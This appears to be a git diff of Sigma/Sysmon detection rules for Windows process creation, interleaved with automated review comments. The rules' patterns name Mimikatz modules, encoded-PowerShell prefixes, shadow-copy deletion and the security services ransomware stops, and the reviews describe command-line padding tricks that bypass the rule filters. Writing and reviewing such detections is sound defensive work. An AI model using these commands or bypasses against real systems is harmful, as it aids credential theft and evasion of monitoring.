https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html 
@@ -32,35 +30,35 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_net_img: - - OriginalFileName: - - net.exe - - net1.exe - - Image|endswith: - - \net.exe - - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe selection_net_cli: - CommandLine|contains: ' stop ' + CommandLine|contains: ' stop ' selection_sc_img: - - OriginalFileName: sc.exe - - Image|endswith: \sc.exe + - OriginalFileName: sc.exe + - Image|endswith: \sc.exe selection_sc_cli: - CommandLine|contains: + CommandLine|contains: - ' stop ' - ' delete ' - ' pause ' selection_pwsh_img: - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Image|endswith: - - \powershell.exe - - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe selection_pwsh_cli: - CommandLine|contains: + CommandLine|contains: - 'Stop-Service ' - 'Remove-Service ' selection_services: - CommandLine|contains: + CommandLine|contains: - 143Svc - Acronis VSS Provider - AcronisAgent @@ -73,7 +71,7 @@ detection: - AVG Antivirus - avgAdminClient - AvgAdminServer - - AVP1 + - AVP1 # Covers multiple AVP versions - BackupExec - bedbg - BITS @@ -81,10 +79,10 @@ detection: - Client Agent 7.60 - Core Browsing Protection - Core Mail Protection - - Core Scanning Server + - Core Scanning Server # Covers 'Core Scanning ServerEx' - DCAgent - - EhttpSr - - ekrn + - EhttpSr # Covers 'EhttpSry', 'EhttpSrv' + - ekrn # Covers 'ekrnEpsw' - Enterprise Client Service - epag - EPIntegrationService @@ -99,7 +97,7 @@ detection: - FirebirdGuardianDefaultInstance - FirebirdServerDefaultInstance - HealthTLService - - MSSQLFDLauncher$ + - MSSQLFDLauncher$ # Covers 'SHAREPOINT', 'TPS', 'SBSMonitoring', etc. - hmpalertsvc - HMS - IISAdmin 
@@ -240,11 +238,8 @@ detection: - wozyprobackup - WRSVC - Zoolz 2 Service - condition: process_creation and (selection_services and (all of selection_net_* - or all of selection_pwsh_* or all of selection_sc_*)) + condition: process_creation and (selection_services and (all of selection_net_* or all of selection_pwsh_* or all of selection_sc_*)) falsepositives: - - Administrators or tools shutting down the services due to upgrade or removal - purposes. If you experience some false positive, please consider adding filters - to the parent process launching this command and not removing the entry + - Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_shadow_copies_creation.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_shadow_copies_creation.yml index eb2d60103..3b87b7a45 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_shadow_copies_creation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_shadow_copies_creation.yml @@ -1,8 +1,7 @@ title: Shadow Copies Creation Using Operating Systems Utilities id: b17ea6f7-6e90-447e-a799-e6c0a493d6ce status: test -description: Shadow Copies creation using operating systems utilities, possible credential - access +description: Shadow Copies creation using operating systems utilities, possible credential access references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/ 
@@ -23,18 +22,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - \wmic.exe - - \vssadmin.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - wmic.exe - - VSSADMIN.EXE + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - \wmic.exe + - \vssadmin.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - wmic.exe + - VSSADMIN.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - shadow - create condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml index 0ab2e2fb1..57a233334 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml @@ -12,8 +12,7 @@ references: - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar - https://redcanary.com/blog/intelligence-insights-october-2021/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware -author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil - Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades) +author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades) date: 2019/10/22 modified: 2022/11/03 tags: 
@@ -30,48 +29,46 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - \wmic.exe - - \vssadmin.exe - - \diskshadow.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - wmic.exe - - VSSADMIN.EXE - - diskshadow.exe + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - \wmic.exe + - \vssadmin.exe + - \diskshadow.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - wmic.exe + - VSSADMIN.EXE + - diskshadow.exe selection1_cli: - CommandLine|contains|all: - - shadow + CommandLine|contains|all: + - shadow # will match "delete shadows" and "shadowcopy delete" and "shadowstorage" - delete selection2_img: - - Image|endswith: \wbadmin.exe - - OriginalFileName: WBADMIN.EXE + - Image|endswith: \wbadmin.exe + - OriginalFileName: WBADMIN.EXE selection2_cli: - CommandLine|contains|all: + CommandLine|contains|all: - delete - catalog - - quiet + - quiet # will match -quiet or /quiet selection3_img: - - Image|endswith: \vssadmin.exe - - OriginalFileName: VSSADMIN.EXE + - Image|endswith: \vssadmin.exe + - OriginalFileName: VSSADMIN.EXE selection3_cli: - CommandLine|contains|all: + CommandLine|contains|all: - resize - shadowstorage - CommandLine|contains: + CommandLine|contains: - unbounded - /MaxSize= - condition: process_creation and ((all of selection1*) or (all of selection2*) - or (all of selection3*)) + condition: process_creation and ((all of selection1*) or (all of selection2*) or (all of selection3*)) fields: - CommandLine - ParentCommandLine falsepositives: - - Legitimate Administrator deletes Shadow Copies using operating systems utilities - for legitimate reason + - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason - LANDesk LDClient Ivanti-PSModule (PS EncodedCommand) level: high ruletype: Sigma 
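Review bot: The PowerShell branch of `selection1_*` matches only cleartext `shadow` and `delete` in the CommandLine, so a `-EncodedCommand` payload — which the `falsepositives` entry `LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)` itself refers to — cannot match this rule at all, since an encoded command line contains neither token (hedged: unless your backend decodes Base64 before matching). Either that false-positive belongs to a script-block rule, or the new `# will match "delete shadows" ...` comment should add `# Base64-encoded PowerShell is not covered here; see the ScriptBlock (4104) rules`. The `# will match -quiet or /quiet` comment is accurate only because `quiet` is unanchored; worth noting it also matches `-quiet` appearing elsewhere on the line.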
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml index c0c8862c4..18add2ff2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml @@ -1,8 +1,7 @@ title: Windows Shell/Scripting Processes Spawning Suspicious Programs id: 3a6586ad-127a-4d3b-a677-1e6eacdf8fde status: test -description: Detects suspicious child processes of a Windows shell and scripting processes - such as wscript, rundll32, powershell, mshta...etc. +description: Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc. references: - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html author: Florian Roth (Nextron Systems), Tim Shelton @@ -27,6 +26,7 @@ detection: - \mshta.exe - \powershell.exe - \pwsh.exe + # - '\cmd.exe' # too many false positives - \rundll32.exe - \cscript.exe - \wscript.exe @@ -42,12 +42,13 @@ detection: CurrentDirectory|contains: \ccmcache\ filter_amazon: ParentCommandLine|contains: + # FP - Amazon Workspaces - \Program Files\Amazon\WorkSpacesConfig\Scripts\setup-scheduledtask.ps1 - \Program Files\Amazon\WorkSpacesConfig\Scripts\set-selfhealing.ps1 - \Program Files\Amazon\WorkSpacesConfig\Scripts\check-workspacehealth.ps1 - - \nessus_ + - \nessus_ # Tenable/Nessus VA Scanner filter_nessus: - CommandLine|contains: \nessus_ + CommandLine|contains: \nessus_ # Tenable/Nessus VA Scanner filter_sccm_install: ParentImage|endswith: \mshta.exe Image|endswith: \mshta.exe @@ -55,7 +56,7 @@ detection: - C:\MEM_Configmgr_ - \splash.hta - '{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}' - CommandLine|contains|all: + CommandLine|contains|all: - C:\MEM_Configmgr_ - \SMSSETUP\BIN\ - \autorun.hta 
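Review bot: `filter_nessus` and the `\nessus_` entry under `filter_amazon` suppress the alert whenever the child or parent command line contains the substring `\nessus_`, and the new `# Tenable/Nessus VA Scanner` comments document the intent without constraining it; since CommandLine is attacker-controlled, a `powershell.exe -c "... # \nessus_"` spawned by wscript is excluded. Pin the exclusion to the scanner binary or install path instead, e.g. `ParentImage|contains: \Tenable\Nessus\` (hedged: confirm the deployed path), keeping `\nessus_` only as an additional condition. The `\nessus_` line also sits under `filter_amazon`, where the new `# FP - Amazon Workspaces` header no longer describes it; it belongs in `filter_nessus`.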
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_sysnative.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_sysnative.yml index 99942122d..0d9448f26 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_sysnative.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_sysnative.yml @@ -1,8 +1,7 @@ title: Process Creation Using Sysnative Folder id: 3c1b5fb0-c72f-45ba-abd1-4d4c353144ab status: test -description: Detects process creation events that use the Sysnative folder (common - for CobaltStrike spawns) +description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns) references: - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ author: Max Altgelt (Nextron Systems) @@ -21,8 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational sysnative: - - CommandLine|contains: :\Windows\Sysnative\ - - Image|contains: :\Windows\Sysnative\ + - CommandLine|contains: :\Windows\Sysnative\ + - Image|contains: :\Windows\Sysnative\ condition: process_creation and sysnative falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_system_exe_anomaly.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_system_exe_anomaly.yml index b7e450bcd..f467ca224 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_system_exe_anomaly.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_system_exe_anomaly.yml @@ -5,8 +5,7 @@ description: Detects a Windows program executable started from a suspicious fold references: - https://twitter.com/GelosSnake/status/934900723426439170 - https://asec.ahnlab.com/en/39828/ -author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, - Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali date: 2017/11/27 modified: 2023/10/18 tags: 
@@ -70,18 +69,20 @@ detection: - \dwm.exe - \LsaIso.exe - \ntoskrnl.exe + # The below processes were seen used by Lazarus Group - https://asec.ahnlab.com/en/39828/ - \wsmprovhost.exe - \dfrgui.exe filter_generic: - - Image|startswith: - - C:\Windows\System32\ - - C:\Windows\SysWOW64\ - - C:\Windows\WinSxS\ - - Image|contains: \SystemRoot\System32\ - - Image: - - C:\Windows\explorer.exe - - C:\Program Files\PowerShell\7\pwsh.exe - - C:\Program Files\PowerShell\7-preview\pwsh.exe + - Image|startswith: + - C:\Windows\System32\ + - C:\Windows\SysWOW64\ + - C:\Windows\WinSxS\ + # - 'C:\avast! sandbox' + - Image|contains: \SystemRoot\System32\ + - Image: + - C:\Windows\explorer.exe + - C:\Program Files\PowerShell\7\pwsh.exe + - C:\Program Files\PowerShell\7-preview\pwsh.exe filter_wsl_windowsapps: Image|startswith: C:\Program Files\WindowsApps\MicrosoftCorporationII.WindowsSubsystemForLinux Image|endswith: \wsl.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_system_user_anomaly.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_system_user_anomaly.yml index 7b085727c..2fd27e99d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_system_user_anomaly.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_system_user_anomaly.yml @@ -1,8 +1,7 @@ title: Suspicious SYSTEM User Process Creation id: 2617e7ed-adb7-40ba-b0f3-8f9945fe6c09 status: test -description: Detects a suspicious process creation as SYSTEM user (suspicious program - or command line parameter) +description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter) references: - Internal Research - https://tools.thehacker.recipes/mimikatz/modules 
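Review bot: `filter_generic` whitelists every image below `C:\Windows\System32\` and `C:\Windows\SysWOW64\` by prefix, which includes the user-writable subfolders beneath them — the Tasks-folder rule later in this same patch states that `System32\Tasks` and `SysWow64\Tasks` are globally writable — so an `svchost.exe`, or the newly added `\wsmprovhost.exe` and `\dfrgui.exe`, dropped into `C:\Windows\System32\Tasks\` is excluded rather than alerted on. Tighten the filter so those paths are not covered, e.g. a separate negated clause `Image|contains: \System32\Tasks\` / `\SysWOW64\Tasks\` kept out of the whitelist; the `condition` line is outside this hunk, so how the filters combine cannot be verified here. The commented-out `# - 'C:\avast! sandbox'` entry would be clearer with a reason, e.g. `# disabled: too broad / unverified path`.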
@@ -26,59 +25,60 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: IntegrityLevel: System - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI selection_special: - - Image|endswith: - - \calc.exe - - \wscript.exe - - \cscript.exe - - \hh.exe - - \mshta.exe - - \forfiles.exe - - \ping.exe - - CommandLine|contains: - - ' -NoP ' - - ' -W Hidden ' - - ' -decode ' - - ' /decode ' - - ' /urlcache ' - - ' -urlcache ' - - ' -e* JAB' - - ' -e* SUVYI' - - ' -e* SQBFAFgA' - - ' -e* aWV4I' - - ' -e* IAB' - - ' -e* PAA' - - ' -e* aQBlAHgA' - - vssadmin delete shadows - - reg SAVE HKLM - - ' -ma ' - - Microsoft\Windows\CurrentVersion\Run - - .downloadstring( - - .downloadfile( - - ' /ticket:' - - 'dpapi::' - - event::clear - - event::drop - - id::modify - - 'kerberos::' - - 'lsadump::' - - 'misc::' - - 'privilege::' - - 'rpc::' - - 'sekurlsa::' - - 'sid::' - - 'token::' - - vault::cred - - vault::list - - ' p::d ' - - ;iex( - - MiniDump - - 'net user ' + - Image|endswith: + - \calc.exe + - \wscript.exe + - \cscript.exe + - \hh.exe + - \mshta.exe + - \forfiles.exe + - \ping.exe + - CommandLine|contains: + # - 'sc stop ' # stops a system service # causes FPs + - ' -NoP ' # Often used in malicious PowerShell commands + - ' -W Hidden ' # Often used in malicious PowerShell commands + - ' -decode ' # Used with certutil + - ' /decode ' # Used with certutil + - ' /urlcache ' # Used with certutil + - ' -urlcache ' # Used with certutil + - ' -e* JAB' # PowerShell encoded commands + - ' -e* SUVYI' # PowerShell encoded commands + - ' -e* SQBFAFgA' # PowerShell encoded commands + - ' -e* aWV4I' # PowerShell encoded commands + - ' -e* IAB' # PowerShell encoded commands + - ' -e* PAA' # PowerShell encoded commands + - ' -e* aQBlAHgA' # PowerShell encoded commands + - vssadmin delete shadows # Ransomware + - reg SAVE HKLM # save registry SAM - syskey extraction + - ' -ma ' # ProcDump + - Microsoft\Windows\CurrentVersion\Run # Run key in 
command line - often in combination with REG ADD + - .downloadstring( # PowerShell download command + - .downloadfile( # PowerShell download command + - ' /ticket:' # Rubeus + - 'dpapi::' # Mimikatz + - event::clear # Mimikatz + - event::drop # Mimikatz + - id::modify # Mimikatz + - 'kerberos::' # Mimikatz + - 'lsadump::' # Mimikatz + - 'misc::' # Mimikatz + - 'privilege::' # Mimikatz + - 'rpc::' # Mimikatz + - 'sekurlsa::' # Mimikatz + - 'sid::' # Mimikatz + - 'token::' # Mimikatz + - vault::cred # Mimikatz + - vault::list # Mimikatz + - ' p::d ' # Mimikatz + - ;iex( # PowerShell IEX + - MiniDump # Process dumping method apart from procdump + - 'net user ' filter_ping: - CommandLine: ping 127.0.0.1 -n 5 + CommandLine: ping 127.0.0.1 -n 5 filter_vs: Image|endswith: \PING.EXE ParentCommandLine|contains: \DismFoDInstall.cmd @@ -93,7 +93,7 @@ detection: - :\Program Files (x86)\Java\ - :\Program Files\Java\ Image|endswith: \bin\jp2launcher.exe - CommandLine|contains: ' -ma ' + CommandLine|contains: ' -ma ' condition: process_creation and (all of selection* and not 1 of filter_*) falsepositives: - Administrative activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_sysvol_access.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_sysvol_access.yml index f867d273a..9bb7a9d1f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_sysvol_access.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_sysvol_access.yml @@ -20,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \SYSVOL\ - \policies\ condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_task_folder_evasion.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_task_folder_evasion.yml index 42eba1ea0..49b3969bf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_task_folder_evasion.yml 
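Review bot: `'net user '` is the only entry in the newly annotated `CommandLine|contains` list without a rationale while every neighbour received one, so a reader cannot tell whether it is an indicator or an accidental catch-all; suggested `- 'net user ' # Local account creation or password change as SYSTEM`. The `# covers many language settings` comment on `User|contains: AUTHORI / AUTORI` should also state what else it matches: `NT AUTHORITY\LOCAL SERVICE` and `NT AUTHORITY\NETWORK SERVICE` contain the same substring and (hedged) also run at System integrity, so `# also matches LOCAL SERVICE / NETWORK SERVICE, not only SYSTEM` would be accurate. The `# Run key in` / `command line ...` split at the line boundary is one broken comment line of this hunk, not two entries.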
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_task_folder_evasion.yml @@ -1,15 +1,10 @@ title: Tasks Folder Evasion id: cc4e02ba-9c06-48e2-b09e-2500cace9ae0 status: test -description: 'The Tasks folder in system32 and syswow64 are globally writable paths. - - Adversaries can take advantage of this and load or influence any script hosts - or ANY .NET Application - - in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, - mshta, eventvwr - - ' +description: | + The Tasks folder in system32 and syswow64 are globally writable paths. + Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application + in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr references: - https://twitter.com/subTee/status/1216465628946563073 - https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26 @@ -30,13 +25,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: + CommandLine|contains: - 'echo ' - 'copy ' - 'type ' - file createnew selection2: - CommandLine|contains: + CommandLine|contains: - ' C:\Windows\System32\Tasks\' - ' C:\Windows\SysWow64\Tasks\' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_use_of_te_bin.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_use_of_te_bin.yml index 9df232bbe..1d6b4816c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_use_of_te_bin.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_use_of_te_bin.yml 
@@ -1,14 +1,9 @@ title: Malicious Windows Script Components File Execution by TAEF Detection id: 634b00d5-ccc3-4a06-ae3b-0ec8444dd51b status: test -description: 'Windows Test Authoring and Execution Framework (TAEF) framework allows - you to run automation by executing tests files written on different languages - (C, C#, Microsoft COM Scripting interfaces - - Adversaries may execute malicious code (such as WSC file with VBScript, dll and - so on) directly by running te.exe - - ' +description: | + Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces + Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/ - https://twitter.com/pabraeken/status/993298228840992768 @@ -27,9 +22,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \te.exe - - ParentImage|endswith: \te.exe - - OriginalFileName: \te.exe + - Image|endswith: \te.exe + - ParentImage|endswith: \te.exe + - OriginalFileName: \te.exe condition: process_creation and selection falsepositives: - It's not an uncommon to use te.exe directly to execute legal TAEF tests diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml index 8dcb9fba8..b03e39b54 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml 
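Review bot: `OriginalFileName: \te.exe` can never match: OriginalFileName is the bare PE version-resource name, and every other rule in this patch uses it without a path separator (`OriginalFileName: sc.exe`, `VSSADMIN.EXE`, `explorer.exe`), so this alternative in `selection` is dead and the rule falls back to `Image|endswith`/`ParentImage|endswith`, which a renamed `te.exe` evades. Change it to `- OriginalFileName: te.exe`. The rewrapped description in the first hunk also leaves the parenthesis after `Microsoft COM Scripting interfaces` unclosed; it should read `...Microsoft COM Scripting interfaces).`.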
@@ -1,20 +1,15 @@ title: Malicious PE Execution by Microsoft Visual Studio Debugger id: 15c7904e-6ad1-4a45-9b46-5fb25df37fd2 status: test -description: 'There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" - to launch specified executable and attach a debugger. - - This option may be used adversaries to execute malicious code by signed verified - binary. - +description: | + There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger. + This option may be used adversaries to execute malicious code by signed verified binary. The debugger is installed alongside with Microsoft Visual Studio package. - - ' references: - https://twitter.com/pabraeken/status/990758590020452353 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/ - https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019 -author: "Agro (@agro_sev), Ensar \u015Eamil (@sblmsrsn), oscd.community" +author: Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community date: 2020/10/14 modified: 2022/10/09 tags: diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_userinit_child.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_userinit_child.yml index d4071aac3..7a7ae3156 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_userinit_child.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_userinit_child.yml @@ -21,10 +21,10 @@ detection: selection: ParentImage|endswith: \userinit.exe filter1: - CommandLine|contains: \netlogon\ + CommandLine|contains: \netlogon\ filter2: - - Image|endswith: \explorer.exe - - OriginalFileName: explorer.exe + - Image|endswith: \explorer.exe + - OriginalFileName: explorer.exe condition: process_creation and (selection and not 1 of filter*) fields: - CommandLine 
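Review bot: `filter1: CommandLine|contains: \netlogon\` excludes any child of `userinit.exe` whose command line contains `\netlogon\` anywhere, so the rule — meant to catch unexpected userinit children such as a tampered `Userinit` value — is bypassed by `cmd.exe /c C:\evil.exe rem \netlogon\`. Restrict the exclusion to the way GPO logon scripts actually appear, e.g. combine `CommandLine|contains: \netlogon\` with an `Image|endswith` list of the script hosts userinit legitimately launches (`\cmd.exe`, `\cscript.exe`, `\wscript.exe`; hedged — confirm against your logon-script telemetry), and add `# logon scripts from \\<domain>\NETLOGON\` so the intent is recorded. `filter2` is sound as written since it pairs `Image|endswith` with `OriginalFileName: explorer.exe`.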
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml index 6dd5d502b..321f1a566 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml @@ -1,9 +1,7 @@ title: Weak or Abused Passwords In CLI id: 91edcfb1-2529-4ac2-9ecc-7617f895c7e4 status: test -description: Detects weak passwords or often abused passwords (seen used by threat - actors) via the CLI. An example would be a threat actor creating a new user via - the net command and providing the password inline +description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ @@ -23,9 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: + # Add more passwords - Asd123.aaaa - - password123 + - password123 # Also covers PASSWORD123123! as seen in https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/ - '123456789' - P@ssw0rd! - Decryptme diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml index 33bf366ac..c6fdcc67b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml 
@@ -1,21 +1,19 @@ title: Usage Of Web Request Commands And Cmdlets id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d related: - - id: 1139d2e2-84b1-4226-b445-354492eba8ba - type: similar - - id: f67dbfce-93bc-440d-86ad-a95ae8858c90 - type: obsoletes - - id: cd5c8085-4070-4e22-908d-a5b3342deb74 - type: obsoletes + - id: 1139d2e2-84b1-4226-b445-354492eba8ba + type: similar + - id: f67dbfce-93bc-440d-86ad-a95ae8858c90 + type: obsoletes + - id: cd5c8085-4070-4e22-908d-a5b3342deb74 + type: obsoletes status: test -description: Detects the use of various web request commands with commandline tools - and Windows PowerShell cmdlets (including aliases) via CommandLine +description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine references: - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/ - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell - https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps -author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin - Songer @austinsonger +author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger date: 2019/10/24 modified: 2023/01/10 tags: @@ -30,7 +28,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - '[System.Net.WebRequest]::create' - 'curl ' - Invoke-RestMethod diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_whoami_as_param.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_whoami_as_param.yml index 74c762cf2..0c51cb9f5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_whoami_as_param.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_whoami_as_param.yml 
@@ -1,8 +1,7 @@ title: WhoAmI as Parameter id: e9142d84-fbe0-401d-ac50-3e519fb00c89 status: test -description: Detects a suspicious process command line that uses whoami as first parameter - (as e.g. used by EfsPotato) +description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato) references: - https://twitter.com/blackarrowsec/status/1463805700602224645?s=12 author: Florian Roth (Nextron Systems) @@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: .exe whoami + CommandLine|contains: .exe whoami condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml b/sigma/sysmon/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml index ee3a56368..c640be7fd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml @@ -1,9 +1,7 @@ title: Suspect Svchost Activity id: 16c37b52-b141-42a5-a3ea-bbe098444397 status: test -description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments - and is normally observed when a malicious process spawns the process and injects - code into the process memory space. +description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space. references: - https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2 author: David Burkett, @signalblur 
